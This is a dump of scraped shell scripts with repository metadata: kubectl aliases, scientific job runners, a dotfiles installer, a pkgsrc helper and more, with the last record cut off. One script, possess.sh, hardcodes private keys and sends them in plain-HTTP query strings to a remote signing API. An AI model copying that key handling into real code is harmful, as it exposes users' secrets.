blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
b4d9f76b1f39dde54769b27c233ff8e9c0def54b
|
Shell
|
velcrine/vorishirne
|
/bash/k8.sh
|
UTF-8
| 815
| 2.671875
| 3
|
[] |
no_license
|
alias kg="kubectl get"
alias kga="kubectl get-all"
alias kd="kubectl delete"
alias ke="kubectl edit"
alias kesc="kubectl modify-secret"
alias kl="kubectl logs -f"
alias kx="kubectl exec -it"
alias ka="kubectl apply -f"
alias kw="watch kubectl get"
alias ky="kubectl get -o yaml"
alias helm3="helm"
KUBECONFIG_DIR="/vorishirne/all/repository/aaorg/kubeconfigs"
export KUBECONFIG="$KUBECONFIG_DIR/dev/config-notthere"
function k8() {
config_name="$1"
config_dir="${2:-dev}"
export KUBECONFIG="$KUBECONFIG_DIR/$config_dir/config-$config_name"
echo $KUBECONFIG
}
function knx() {
cat $KUBECONFIG >"$KUBECONFIG"-"$1"
export KUBECONFIG="$KUBECONFIG"-"$1"
kubectl config set-context --current --namespace=$1
echo $KUBECONFIG
}
function kns() {
kubectl config set-context --current --namespace=$1
}
| true
|
72b048aa4606a364a4548ef519df18e7ec2e7f28
|
Shell
|
tmellan/scripts_imp
|
/runTI.sh
|
UTF-8
| 1,671
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
lambdaList="0.0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1.0"
dir=`pwd`
TList="500 1000 1500 2000"
S=20000
stepList=(20000 20000 20000 20000)
d=-1
name="r1"
#potparas_33_mixed-wtest-4_3_9393254559_0a0c
nPairs="33"
vols="0a0c"
sizes="mixed-wtest-4_3_9393254559"
for l in $nPairs; do
if [ ! -d $l ]; then mkdir $l ; fi ; cd $l
for v in $vols; do
if [ ! -d $v ]; then mkdir $v ; fi ; cd $v
for k in $sizes; do
if [ ! -d $k ]; then mkdir $k ; fi ; cd $k
d=-1
for j in $TList; do
if [ ! -d $j ]; then mkdir $j ; fi ; cd $j
let d=d+1
c=0
for i in $lambdaList; do
let c=c+1
if [ ! -d lambda$i ]; then mkdir lambda$i ; fi ; cd lambda$i
cp $dir/INPUT/HesseMatrix_sphinx_$v HesseMatrix_sphinx && cp $dir/INPUT/POSCAR_$v POSCAR
cp $dir/INPUT/settings_$l settings && cp $dir/INPUT/potBest/"potparas_"$l"_"$k"_"$v potparas
s=`date +%N | awk '{printf "%7d",$1%942438976}'`
sed -e 's|xxxLAMBDAxxx|'$i'|' \
-e 's|xxxTEMPxxx|'$j'|' \
-e 's|xxxSTEPSxxx|'${stepList[$d]}'|' \
-e 's|xxxSEEDxxx|'"$s"'|' $dir/INPUT/INCAR > INCAR
sed -i 's/= 0.01/= 0.05/g' INCAR
sed -i 's/= 1/= 1/g' INCAR
nice -20 integrate_TU-TILD_SUPERFAST.x 2>&1 > 1.out &
cd $dir/$l/$v/$k/$j
done
cd $dir/$l/$v/$k
echo done $j/$k
done
cd $dir/$l/$v
done
cd $dir/$l
done
cd $dir
done
| true
|
042ad5854138146f9faa4a04c4d630ca067af4d0
|
Shell
|
Hi-PACE/hipace
|
/tests/hosing.2Rank.sh
|
UTF-8
| 1,422
| 2.875
| 3
|
[
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#! /usr/bin/env bash
# Copyright 2021
#
# This file is part of HiPACE++.
#
# Authors: AlexanderSinn, MaxThevenet, Severin Diederichs
# License: BSD-3-Clause-LBNL
# This file is part of the HiPACE++ test suite.
# It runs a Hipace simulation in the blowout regime and compares the result
# with SI units.
# abort on first encounted error
set -eu -o pipefail
# Read input parameters
HIPACE_EXECUTABLE=$1
HIPACE_SOURCE_DIR=$2
HIPACE_EXAMPLE_DIR=${HIPACE_SOURCE_DIR}/examples/blowout_wake
HIPACE_TEST_DIR=${HIPACE_SOURCE_DIR}/tests
rm -rf hosing_data
# Run the simulation
mpiexec -n 2 $HIPACE_EXECUTABLE $HIPACE_EXAMPLE_DIR/inputs_normalized \
plasmas.sort_bin_size = 8 \
hipace.dt = 20 \
diagnostic.output_period = 10 \
beam.injection_type = fixed_weight \
beam.num_particles = 1000000 \
beam.density = 200 \
beam.position_std = 0.1 0.1 1.41 \
beam.dx_per_dzeta = 0.2 \
plasmas.names = plasma ions \
plasma.neutralize_background = 0 \
"ions.density(x,y,z)" = 1. \
ions.ppc = 1 1 \
ions.charge = 1 \
ions.mass = 1836 \
ions.neutralize_background = 0 \
hipace.file_prefix=hosing_data/ \
max_step=10
# Compare the results with checksum benchmark
$HIPACE_TEST_DIR/checksum/checksumAPI.py \
--evaluate \
--file_name hosing_data/ \
--test-name hosing.2Rank \
--skip "{'beam': 'id'}"
| true
|
b04985e3e08818bbde3b267baa4e5c7002585cb2
|
Shell
|
jiarong/seqdep
|
/examples/10k.fq.bz2.sh
|
UTF-8
| 2,269
| 2.8125
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
#! /bin/bash
#PBS -q main
#PBS -l nodes=1:ppn=1,walltime=4:00:00
#PBS -l mem=21gb
#PBS -j oe
Readfile=../tests/test-data/10k.fq.bz2
# parameters to samples data for curve
Start=0
End=1
Steps=100
Reps=10
Trimmed_length=90
# Subsample reads from original read data
Subsample_seq_num=1000000
# Subsample representatives from abundance table
Subsample_rep_num=500000
Scriptdir=/mnt/home/guojiaro/Documents/software/gits/seqdep/scripts
Ksize=21
Hashsize=1000000000
#
# change parameters above
#
# big count use 2Byte for each kmer;
Hashmem=$(echo "scale=2; $Hashsize*2*4/1000000000" | bc)
echo "$Hashmem Gb is used for hashtable"
set -e
module load screed
module load NumPy
module load khmer/1.3
Bname=$(basename $Readfile)
Readfile=$(cd "$(dirname $Readfile)" && pwd)/$(basename $Readfile)
Outdir=$Readfile.seqdep.out
mkdir -p $Outdir
cd $Outdir
echo "loading counting table.."
python $Scriptdir/trim-seq-by-len.py $Readfile $Trimmed_length $Subsample_seq_num /2 - |\
tee $Bname.subseq.$Subsample_seq_num | \
load-into-counting.py -k $Ksize -x $Hashsize -N 4 $Bname.subseq.$Subsample_seq_num.ht -
echo "loading counting table finished.."
echo "start counting median kmer.."
count-median.py $Bname.subseq.$Subsample_seq_num.ht $Bname.subseq.$Subsample_seq_num $Bname.subseq.$Subsample_seq_num.K${Ksize}.medcount
echo "finish counting median kmer.."
echo "$Subsample_rep_num reps from $Subsample_seq_num are used for getting redundancy data before curve fitting"
Sweep_ratio=$(echo "scale=1; $Subsample_seq_num/$Subsample_rep_num" | bc)
python $Scriptdir/subsample-line.py $Bname.subseq.$Subsample_seq_num.K${Ksize}.medcount $Subsample_rep_num $Bname.subseq.$Subsample_seq_num.K${Ksize}.medcount.subrep.$Subsample_rep_num
echo "start making .npo file.."
python $Scriptdir/redunancy-curve.py $Bname.subseq.$Subsample_seq_num.K${Ksize}.medcount.subrep.$Subsample_rep_num $Start $End $Steps $Reps > $Bname.subseq.$Subsample_seq_num.K${Ksize}.medcount.subrep.$Subsample_rep_num.curve
echo "finish making .npo file.."
Rscript $Scriptdir/seqdep.R $Bname.subseq.$Subsample_seq_num.K${Ksize}.medcount.subrep.$Subsample_rep_num.curve $Sweep_ratio > $Bname.subseq.$Subsample_seq_num.K${Ksize}.medcount.subrep.$Subsample_rep_num.curve.R.params
qstat -f ${PBS_JOBID}
| true
|
98484022c68fad092e831304556f184ed460db19
|
Shell
|
Trusted-IoT-Alliance/IOTRegistrySwagger
|
/test/possess.sh
|
UTF-8
| 4,006
| 2.625
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
HOST=hl-sk-j-040.brackets.trade:8081
USERAPUBK=0318b8d3f9d2889ee18dd8a48bfdb539ffff4b7498864e7071addd1edb225690e3
USERAPRIVK=dc030fcfc70a24a1086421d4fc43b927dc29c7df87e4d87a6ee2ed76cf7a75d7
USERAADDR=c535bbbf772521e84c8da4378d1b21e6a4578d37
USERBPUBK=0225e0c73e75ce512f14054d9629107b9b1365d0533248b6fb9da9987ea673dcef
USERBPRIVK=de8e3f1b60c6d147c88c976f1d45e11dbcd5f09eb06f96f226cf1a9b337003d5
USERBADDR=271e7290a25454222b556aadb61bdf832cf3d3b3
POPCODEAPUBK=0246bcbefe3cb4a848ec801b3eb13e9fedc874a53f449d9c5f57c5de7fec8823ce
POPCODEAPRIVK=13874f54991ceb3f7f0b0169fc5f48fa90b3ec27d50c762961d53b28424c1de9
POPCODEAADDR=ccd652f622d8d63127babb4c4e34f8c831136adc
POPCODEAPUBK=0297bb72d581a99abb4b006fac0403871c9ec3b54ce303d2709864752bdf867350
POPCODEAPRIVK=16f8ef102297bdf5c3fddbbf443eb7ff74ba0450b867d2d0bab6b1c826e62250
POPCODEAADDR=4f967c63925015fc9186231d739c6ad185dc0f4c
# Get Balance
echo get balance
result=$(curl -f -s -X GET --header 'Accept: application/json' "http://$HOST/v1/balance?PopcodeAddress=$POPCODEAADDR")
result=$(echo $result | sed 's/\\/\\\\\\/g')
CounterSeedStr=$(echo "console.log(JSON.parse('$result').Counter)" | node)
echo $CounterSeedStr
if [ -z "$CounterSeedStr" ] ; then
echo Missing counter seed string
exit
fi
echo
# Get signature for create
echo create signature
echo "http://hl-sk-j-040.brackets.trade:8081/v1/generateCreateSig?CounterSeedStr=$CounterSeedStr&Amount=10&Data=1&Type=1&PopcodeAddress=$POPCODEAADDR&CreatorPrivateKey=$USERAPRIVK"
result=$(curl -f -s -X POST \ --header 'Accept: text/html' \
"http://hl-sk-j-040.brackets.trade:8081/v1/generateCreateSig?CounterSeedStr=$CounterSeedStr&Amount=10&Data=1&Type=1&PopcodeAddress=$POPCODEAADDR&CreatorPrivateKey=$USERAPRIVK")
SIG=$(echo "console.log(JSON.parse('$result').sig)" | node)
echo signature $SIG
if [ -z "$SIG" ] ; then
echo "did not get signature"
exit
fi
echo
echo "http://hl-sk-j-040.brackets.trade:8081/v1/create?PopcodeAddress=$POPCODEAADDR&Amount=10&Data=1&Type=1&CreatorPubKey=$USERAPUBK&CreatorSig=$SIG"
result=$(curl -f -s -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' \
"http://hl-sk-j-040.brackets.trade:8081/v1/create?PopcodeAddress=$POPCODEAADDR&Amount=10&Data=1&Type=1&CreatorPubKey=$USERAPUBK&CreatorSig=$SIG")
result=$(echo "console.log(JSON.parse('$result').result)" | node)
if [ -z "$result" ] ; then
echo "missing result"
exit
fi
echo
# Get Balance
echo get balance
result=$(curl -f -s -X GET --header 'Accept: application/json' "http://$HOST/v1/balance?PopcodeAddress=$POPCODEAADDR")
result=$(echo $result | sed 's/\\/\\\\\\/g')
CounterSeedStr=$(echo "console.log(JSON.parse('$result').Counter)" | node)
Output=$(echo "console.log(JSON.parse('$result').Outputs.length - 1)" | node)
echo Counter Seed Str $CounterSeedStr
echo Output $Output
if [ -z "$CounterSeedStr" ] ; then
echo Missing counter seed string
exit
fi
if [ -z "$Output" ] ; then
echo Missing counter seed string
exit
fi
echo
# Generate Possess Signature
echo Generate Possess Signature
echo "http://hl-sk-j-040.brackets.trade:8081/v1/generatePossessSig?CounterSeedStr=$CounterSeedStr&Output=$Output&Data=1&NewOwnersPubKeys=$USERBPUBK&PopcodePrivateKey=$POPCODEAPRIVK"
result=$(curl -f -s -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' \
"http://hl-sk-j-040.brackets.trade:8081/v1/generatePossessSig?CounterSeedStr=$CounterSeedStr&Output=$Output&Data=1&NewOwnersPubKeys=$USERBPUBK&PopcodePrivateKey=$POPCODEAPRIVK")
SIG=$(echo "console.log(JSON.parse('$result').sig)" | node)
if [ -z "$SIG" ] ; then
echo "did not get signature"
exit
fi
echo
# Possess
echo Possess
echo "http://hl-sk-j-040.brackets.trade:8081/v1/possess?PopcodeAddress=$POPCODEAADDR&Data=1&PopcodePubKey=$POPCODEAPUBK&PopcodeSig=$SIG&NewOwnersPubKeys=$USERBPUBK&Output=$Output"
result=$(curl -s -X POST --header 'Content-Type: application/json' --header 'Accept: application/json' \
"http://hl-sk-j-040.brackets.trade:8081/v1/possess?PopcodeAddress=$POPCODEAADDR&Data=1&PopcodePubKey=$POPCODEAPUBK&PopcodeSig=$SIG&NewOwnersPubKeys=$USERBPUBK&Output=$Output")
echo $result
| true
|
b49cc8974628ce517b2e5ffd03ee980be93dc615
|
Shell
|
phrac/dotfiles
|
/scripts/bin/cmus.sh
|
UTF-8
| 395
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/sh
echo -n `cmus-remote -Q | grep "tag artist" | sed s/"tag artist"/""/g | sed '1s/^.//' | head -n 1`
echo -n " - "
echo -n `cmus-remote -Q | grep "tag title" | sed s/"tag title"/""/g | sed '1s/^.//'`
echo -n " ("
s=`cmus-remote -Q | grep "status" | sed s/"status"/""/g | sed '1s/^.//'`
if [[ $s = "playing" ]] then
status=""
else
status=""
fi
echo -n $status
echo -n ")"
| true
|
3e23886c4481805917254813808c73777924a034
|
Shell
|
ankurdave/dotfiles
|
/bin/setup
|
UTF-8
| 5,792
| 3.703125
| 4
|
[] |
no_license
|
#!/bin/bash
set -eu
dotfiles=$(cd $(dirname $0)/.. && pwd)
command_exists () {
type "$1" &> /dev/null ;
}
symlink () {
file=$1
target=$2
# Back up real files (not symlinks) to ~/config-old/
if [[ -e "$target" && ! -L "$target" ]]
then
echo "Moving old version of $target to ~/config-old/$(basename "$file")"
mkdir -p ~/config-old/
mv "$target" ~/config-old/
fi
# Just delete symlinks, because they are probably from a previous run
if [[ -L "$target" ]]
then
rm "$target"
fi
echo "Symlinking $target"
ln -s "$file" "$target"
}
hardlink () {
file="$1"
target="$2"
# Back up files to ~/config-old/
if [[ -e "$target" ]]
then
echo "Moving old version of $target to ~/config-old/$(basename "$file")"
mkdir -p ~/config-old/
if ! [[ "$target" -ef ~/config-old/"$(basename "$target")" ]]; then
mv "$target" ~/config-old/
fi
fi
echo "Hardlinking $target"
ln -f "$file" "$target"
}
if [ -d "$HOME/Dropbox/history" ]; then
symlink $HOME/Dropbox/history ~/history
else
mkdir -p ~/history
fi
# Link dotfiles into ~ and back up the old dotfiles into ~/config-old
find "$dotfiles" -mindepth 1 -maxdepth 1 -not \( \
-iname '*~' -or \
-iname '*#*' -or \
-iname '.hg' -or \
-iname '.git' -or \
-iname '.gitmodules' -or \
-iname 'bin' -or \
-iname 'misc' -or \
-iname 'afew' \
\) | while read file; do
symlink "$file" ~/"$(basename "$file")"
done
mkdir -p ~/.config/afew
find "$dotfiles"/misc/afew -mindepth 1 -maxdepth 1 | while read file; do
symlink "$file" ~/.config/afew/"$(basename "$file")"
done
mkdir -p ~/.sbt/0.13
symlink "$dotfiles"/misc/ctags.sbt ~/.sbt/0.13/ctags.sbt
mkdir -p ~/.ipython/profile_default
symlink "$dotfiles"/misc/ipython_kernel_config.py ~/.ipython/profile_default/ipython_kernel_config.py
# OS X setup
if [ -d ~/Library ] && command_exists defaults; then
brew bundle install --global --verbose
pip install --upgrade -r "$dotfiles"/misc/pip-global-requirements.txt
mkdir -p ~/Library/KeyBindings
hardlink "$dotfiles"/misc/DefaultKeyBinding.dict \
~/Library/KeyBindings/DefaultKeyBinding.dict
# Remap Apple internal keyboard to Dvorak. Regenerate this file as follows:
# git clone github.com:ankurdave/KE-complex_modifications
# cd KE-complex_modifications
# make
# cp public/json/dvorak_for_apple_internal_keyboard.json ~/repos/dotfiles/misc/
mkdir -p ~/.config/karabiner/assets/complex_modifications
hardlink "$dotfiles"/misc/dvorak_for_apple_internal_keyboard.json \
~/.config/karabiner/assets/complex_modifications/dvorak_for_apple_internal_keyboard.json
mkdir -p ~/Library/Preferences
hardlink "$dotfiles"/misc/com.googlecode.iterm2.plist \
~/Library/Preferences/com.googlecode.iterm2.plist
# Launch agents
find "$dotfiles"/misc -mindepth 1 -maxdepth 1 \
-name 'com.ankurdave.*.plist' | while read file; do
hardlink "$file" ~/Library/LaunchAgents/"$(basename "$file")"
done
## From https://github.com/mathiasbynens/dotfiles/blob/master/.macos:
# Disable the sound effects on boot
sudo nvram SystemAudioVolume=" "
# Disable Resume system-wide
defaults write com.apple.systempreferences NSQuitAlwaysKeepsWindows -bool false
# Enable full keyboard access for all controls
# (e.g. enable Tab in modal dialogs)
defaults write NSGlobalDomain AppleKeyboardUIMode -int 3
# Faster keyboard repeat rate
defaults write -g ApplePressAndHoldEnabled -bool false
defaults write NSGlobalDomain KeyRepeat -int 2
defaults write NSGlobalDomain InitialKeyRepeat -int 15
# Finder: show hidden files by default
defaults write com.apple.finder AppleShowAllFiles YES
defaults write NSGlobalDomain AppleShowAllExtensions YES
# Disable the warning when changing a file extension
defaults write com.apple.finder FXEnableExtensionChangeWarning -bool false
# Use list view in all Finder windows by default
# Four-letter codes for the other view modes: `icnv`, `clmv`, `Flwv`
defaults write com.apple.finder FXPreferredViewStyle -string "Nlsv"
# Speed up Mission Control animations
defaults write com.apple.dock expose-animation-duration -float 0.1
# Prevent Photos from opening automatically when devices are plugged in
defaults -currentHost write com.apple.ImageCapture disableHotPlug -bool true
# Disable local Time Machine backups
#hash tmutil &> /dev/null && sudo tmutil disablelocal
# Disable Spotlight indexing for any volume that gets mounted and has not yet
# been indexed before.
# Use `sudo mdutil -i off "/Volumes/foo"` to stop indexing any volume.
#sudo defaults write /.Spotlight-V100/VolumeConfiguration Exclusions -array "/Volumes"
# Don’t prompt for confirmation before downloading
defaults write org.m0k.transmission DownloadAsk -bool false
defaults write org.m0k.transmission MagnetOpenAsk -bool false
# IP block list.
# Source: https://giuliomac.wordpress.com/2014/02/19/best-blocklist-for-transmission/
defaults write org.m0k.transmission BlocklistNew -bool true
defaults write org.m0k.transmission BlocklistURL -string "http://john.bitsurge.net/public/biglist.p2p.gz"
defaults write org.m0k.transmission BlocklistAutoUpdate -bool true
# Bottom left screen corner puts display to sleep
defaults write com.apple.dock wvous-bl-corner -int 10
defaults write com.apple.dock wvous-bl-modifier -int 0
# Other prefs
defaults write com.apple.finder CreateDesktop false
defaults write -app Skim SKAutoReloadFileUpdate -boolean true
git lfs install
fi
| true
|
77031dcc7fffa23fb38430fc198018eec8bb538e
|
Shell
|
yoonseongduk/script
|
/initial/012_iplinfo.sh
|
UTF-8
| 2,074
| 3.21875
| 3
|
[] |
no_license
|
#!/bin/bash
#################################################################################
# #
# Script Name: 012_iplinfo.sh #
# #
# Description: xxxxxxxxxxxxxxxxxxxx script #
# #
# Modified: #
# #
# 2015.01.16 SAL_SUM:35142 #
# created by root #
# #
# Licensed Materials - Property of LG CNS #
# #
# (C) COPYRIGHT LG CNS Co., Ltd. 2009 #
# All Rights Reserved #
# #
#################################################################################
typeset GDC=${GDC:-isc}
typeset source_ip=${source_ip:-"v1"}
logdir=/${GDC}/logs001/initial_setup
logfile=$(basename $0).$(date +%Y%m%d).$(date +%H%M%S)
logdf=$logdir/$logfile
mkdir -p $logdir
function main_rtn {
set -xv
cd /usr/local/bin
scp -i ~/.ssh/id_rsa.v1 ${source_ip}:/isc/sorc001/root/shell/initial/iplinfo .
scp -i ~/.ssh/id_rsa.v1 ${source_ip}:/isc/sorc001/root/shell/initial/iplinfo_Sxx .
cp /usr/local/bin/iplinfo_Sxx /etc/init.d/iplinfo
update-rc.d iplinfo defaults
/etc/init.d/iplinfo start
/usr/local/bin/iplinfo
set +xv
}
main_rtn 2>&1 | tee -a $logdf
# SAL_SUM:35142:2015.01.16 Do not delete this line
| true
|
3f6c781ef49e00a96ef4025323de4eb98f93f0c0
|
Shell
|
NetBSD/pkgsrc-wip
|
/pkg_fake/files/pkg_fake
|
UTF-8
| 7,485
| 4.03125
| 4
|
[] |
no_license
|
#!/bin/sh
#
# author: pancake@phreaker.net
#
# installs or removes fake packages into the pkgsrc database.
# creates and manages fake alternatives on pkgsrc.
# allows to hide and show packages from the pkgsrc database.
# variable initialization #
PREFIX=@PREFIX@
PKGDB=@PKGDB@
PKGSRC=@PKGSRC@
PKGHIDE=${PKGDB}/../pkg_hide
if [ -z "${EDITOR}" ]; then
EDITOR=vi
fi
# help functions #
show_help()
{
cat <<EOF
Usage: pkg_fake [-aAclLprRihH] [pkgname]
Version: 0.3
fake packages:
-a : append files to the target fake package PLIST.
-c : clears target package fake PLIST.
(useful for pkg_fake -p ezm3 | pkg_fake -a ezm3)
-i : install a new fake package.
-l : list all fake packages.
-p : shows the PLIST of an installed or not package.
-r : remove a fake package.
fake alternatives:
-A : adds fake alternatives to a package.
-L : list all fake alternatives.
-R : remove fake alternative support to a package.
hidding utilities:
-h : hides the desired package.
-H : list all hide packages.
-u : unhide the selected package.
EOF
}
init_hide()
{
mkdir -p ${PKGHIDE} 2>&1 >/dev/null || \
( echo "Cannot create '${PKGHIDE}' directory." && \
exit 1 )
}
fini_hide()
{
if [ ! "`ls ${PKGHIDE}`" ]; then
rm -rf ${PKGHIDE} 2>&1 >/dev/null
fi
}
list_all()
{
cd ${PKGDB}
for A in `ls`; do
if [ -e "${A}/+FAKE" ]; then
COMMENT="`cat ${A}/+COMMENT`"
printf "${A}\t\t${COMMENT}\n"
fi
done
}
list_all_alternatives()
{
cd ${PKGDB}
for A in `ls`; do
if [ -e "${A}/+FAKE_ALT" ]; then
COMMENT="`cat ${A}/+COMMENT`"
printf "${A}\t\t${COMMENT}\n"
fi
done
}
edit_alternatives()
{
PKG="$1"
echo "Type in editor the wrapper lines in format:"
echo "\"bin/python /usr/pkg/bin/python2p3\""
echo
echo "press enter"
read
${EDITOR} "${PKGDB}/${PKG}/+ALTERNATIVES"
pkg_alternatives register "${PKGDB}/${PKG}/+ALTERNATIVES"
}
package_autocompletion()
{
NAME=$1
TDIR=$2
# XXX this check is redundant
if [ -z "${NAME}" ]; then
echo "" >/dev/stderr
echo "Target package name is mandatory." >/dev/stderr
exit 1
fi
MAYBE="`ls ${TDIR} | grep "^${NAME}"`"
if [ "1" = `echo ${MAYBE} | wc -w` ]; then
echo "Autocomplenting package name to: ${MAYBE}" >/dev/stderr
echo ${MAYBE}
else
if [ -z "${MAYBE}" ]; then
echo "Target package does not exists." > /dev/stderr
else
echo "There'r more than one alternative for this package:" >/dev/stderr
echo ${MAYBE} >/dev/stderr
exit 1
fi
fi
}
clear_contents()
{
PKG=$1
echo "@name ${PKG}" > ${PKGDB}/${PKG}/+CONTENTS
echo "@cwd ${PREFIX}" >> ${PKGDB}/${PKG}/+CONTENTS
}
print_plist()
{
PKGDIR=$1
cd ${PKGSRC}/${PKG}
`bmake show-var VARNAME=_GENERATE_PLIST | sed -e 's,; true;,,'` | eval awk `bmake show-var VARNAME=_PLIST_AWK_SCRIPT`
}
# main #
if [ -z "${1}" ]; then
show_help
exit 1
fi
case "${1}" in
"-l"|"-L"|"-H")
;;
*)
if [ -z "${2}" ]; then
show_help
echo ""
echo "!! Target package name is mandatory. !!"
exit 1
fi
;;
esac
if [ -z "$1" ]; then break; fi
case $1 in
"-l") # list all fake packages installed
list_all
exit 0
;;
"-L") # list all fake alternatives
list_all_alternatives
exit 0
;;
"-a") # adds files to a fake package
PKG=`package_autocompletion "${2}" "${PKGDB}"`
if [ -z "${PKG}" ]; then
echo "Target package required"
exit 1
fi
if [ -e "${PKGDB}/${PKG}/+FAKE" ]; then
if [ ! "1" = "`cat ${PKGDB}/${PKG}/+CONTENTS | wc -l`" ]; then
echo "Target package already have PLIST."
echo "Press ^C to cancel the append."
fi
echo "^D or EOF finishes."
cat >> ${PKGDB}/${PKG}/+CONTENTS
echo "done"
else
echo "This is not a fake package."
fi
;;
"-c") # clears the PLIST file
PKG=`package_autocompletion "${2}" "${PKGDB}"`
if [ -z "${PKG}" ]; then
echo "Target package required"
exit 1
fi
clear_contents ${PKG}
echo "done"
;;
"-p") # shows the PLIST of a installed or not package.
PKG=$2
if [ -n "`echo ${PKG}| grep /`" ]; then
if [ ! -d "${PKGSRC}/${PKG}" ]; then
echo "This package does not exists."
exit 1
fi
print_plist ${PKGSRC}/${PKG}
else
PKG=`package_autocompletion "${2}" "${PKGDB}"`
if [ -z "${PKG}" ]; then
echo "Package not installed. looking in the pkgsrc tree." > /dev/stderr
PKG=`pkgfind -qxn1 "${2}"`
if [ -z "${PKG}" ]; then
echo "No target package found." >/dev/stderr
exit 1
fi
print_plist ${PKGSRC}/${PKG}
else
cat ${PKGDB}/${PKG}/+CONTENTS
fi
fi
;;
"-i") # install new fake package
PKG="${2}"
if [ -z "${PKG}" ]; then
echo "Target package required"
exit 1
fi
if [ -d "${PKGDB}/${PKG}" ]; then
echo "package ${PKG} yet exists."
exit 1
fi
printf "COMMENT="
read COMMENT
COMMENT="FAKE ${COMMENT}"
# create package
mkdir -p "${PKGDB}/${PKG}"
:> "${PKGDB}/${PKG}/+FAKE"
clear_contents ${PKG}
#echo "@name ${PKG}" > "${PKGDB}/${PKG}/+CONTENTS"
#echo "@cwd ${PREFIX}" > "${PKGDB}/${PKG}/+CONTENTS"
echo "OBJECT_FMT=ELF" > "${PKGDB}/${PKG}/+BUILD_INFO"
echo "OPSYS=`uname -s`" > "${PKGDB}/${PKG}/+BUILD_INFO"
:> "${PKGDB}/${PKG}/+DESC"
:> "${PKGDB}/${PKG}/+SIZE_ALL"
:> "${PKGDB}/${PKG}/+SIZE_PKG"
echo "${COMMENT}" > "${PKGDB}/${PKG}/+COMMENT"
echo "[i] package created."
exit 0
;;
"-A") # creates a new fake alternative
PKG=`package_autocompletion "${2}" "${PKGDB}"`
if [ -z "${PKG}" ]; then exit 1; fi
if [ -e "${PKGDB}/${PKG}/+ALTERNATIVES" ]; then
if [ -e "${PKGDB}/${PKG}/+FAKE_ALT" ]; then
edit_alternatives ${PKG}
else
echo "This is not a valid fake alternatives package (already have a valid ALTERNATIVES)."
fi
else
:> "${PKGDB}/${PKG}/+FAKE_ALT"
edit_alternatives ${PKG}
fi
exit 0
;;
"-r") # removes a fake package
PKG=`package_autocompletion "${2}" "${PKGDB}"`
if [ -z "${PKG}" ]; then exit 1; fi
if [ -e "${PKGDB}/${PKG}/+FAKE" ]; then
rm -rf "${PKGDB}/${PKG}" 2>&1 >/dev/null
if [ "$?" = "0" ]; then
echo "package removed."
exit 0
else
echo "cannot remove pacakge. check permissions."
exit 1
fi
else
echo "target package isn't fake. not removed."
exit 1
fi
;;
"-R") # removes a fake alternatives
PKG=`package_autocompletion "${2}" "${PKGDB}"`
if [ -z "${PKG}" ]; then exit 1; fi
if [ ! -d "${PKGDB}/${PKG}" ]; then
echo "This package does not exists."
exit 1
fi
if [ -e "${PKGDB}/${PKG}/+FAKE_ALT" ]; then
pkg_alternatives -gs unregister "${PKGDB}/${PKG}/+ALTERNATIVES"
rm -f "${PKGDB}/${PKG}/+ALTERNATIVES" &&
rm -f "${PKGDB}/${PKG}/+FAKE_ALT" &&\
echo "Fake alternatives removed from ${PKG}"
else
echo "this is not a fake alternative package"
fi
exit 0;
;;
# Hidding
"-h"|"--hide") # hides the desired package.
init_hide
PKG=`package_autocompletion "${2}" "${PKGDB}"`
if [ -z "${PKG}" ]; then exit 1; fi
if [ -e "${PKGDB}/${PKG}" ]; then
mv ${PKGDB}/${PKG} ${PKGHIDE}/${PKG}
exit 0
else
echo "Target package is not installed in your system."
exit 1
fi
fini_hide
;;
"-u"|"--unhide") # unhides the target package.
init_hide
PKG=`package_autocompletion "${2}" "${PKGHIDE}"`
if [ -z "${PKG}" ]; then exit 1; fi
if [ -e ${PKGHIDE}/${PKG} ]; then
mv ${PKGHIDE}/${PKG} ${PKGDB}/${PKG}
exit 0
else
echo "Target package is not installed in your system."
exit 1
fi
fini_hide
;;
"-H") # list all hidding packages.
if [ -d "${PKGHIDE}" ]; then
ls ${PKGHIDE}
fi
;;
*) # shows help message
show_help
exit 0
;;
esac
exit 1
| true
|
775dafa8bbb22180e54a05ee4e286cb665420d68
|
Shell
|
phisphere/dotfiles
|
/.bashrc
|
UTF-8
| 1,442
| 2.953125
| 3
|
[] |
no_license
|
[ -z "$PS1" ] && return
PS1='\[\e[0;32m\]\u\[\e[m\] \[\e[1;34m\]\w\[\e[m\] \[\e[m\] \[\e[1;32m\]\$ \[\e[m\]\[\e[0;37m\] '
# alias
alias ls='ls --color=auto'
eval `dircolors -b`
alias c='clear'
alias e='exit'
alias x='startx'
alias h='halt'
alias r='reboot'
alias zen='pmount /dev/sdb1'
alias zenu='pumount /dev/sdb1'
alias am='alsamixer'
alias ht='htop'
alias rt='rtorrent'
alias moc='mocp -T default'
alias mp='mplayer'
alias wc='weechat-curses'
alias mi='mitter -i cmd'
alias mkp='makepkg -c'
alias ex='extract'
alias et='amixer sset Master,0 96 & sh /usr/local/games/enemy-territory/et'
alias ut='amixer sset Master,0 96 & /home/verner/downloads/games/urbanterror/ioUrbanTerror.i386'
# extract
extract () {
if [ -f $1 ]; then
case $1 in
*.tar.bz2) tar xjf $1 ;;
*.tar.gz) tar xzf $1 ;;
*.bz2) bunzip2 $1 ;;
*.rar) unrar e $1 ;;
*.gz) gunzip $1 ;;
*.tar) tar xf $1 ;;
*.tbz2) tar xjf $1 ;;
*.tgz) tar xzf $1 ;;
*.zip) unzip $1 ;;
*.Z) uncompress $1 ;;
*.7z) 7z x $1 ;;
*) echo "'$1' cannot be extracted via extract()" ;;
esac
else
echo "'$1' is not a valid file"
fi
}
# bash completion
if [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
# other
export OOO_FORCE_DESKTOP=gnome
| true
|
18bdc5499747840797e4e48dc6cb917952afd131
|
Shell
|
jaburns/quickmail
|
/startup
|
UTF-8
| 408
| 2.734375
